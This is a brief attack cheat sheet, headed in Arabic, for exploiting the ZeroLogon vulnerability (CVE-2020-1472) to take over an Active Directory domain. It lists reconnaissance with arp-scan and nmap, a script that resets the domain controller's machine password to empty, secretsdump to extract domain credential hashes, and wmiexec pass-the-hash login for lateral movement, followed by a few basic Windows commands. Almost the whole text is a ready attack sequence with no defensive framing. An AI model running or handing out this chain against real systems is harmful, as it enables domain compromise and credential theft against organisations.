
نص استغلال لـ CVE-2020-1472 (ZeroLogon) مع تصعيد تلقائي للصلاحيات، واستخراج بيانات الاعتماد عبر secretsdump، والحركة الجانبية باستخدام wmiexec لاختراق نطاق Active Directory.
arp-scan Rang_ip
nmap -A -vv -Pn IP_ADDR
python3 set_empty_pw.py DC_NETBIOS_NAME DC_IP_ADDR
python3 secretsdump.py -no-pass -just-dc DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR
python3 wmiexec.py -hashes Hass_Passwd_User DOMAIN/User@dc_ip_addr
#أوامر ويندوز
whoami
systeminfo
hostname
md test_dir
echo test > test_file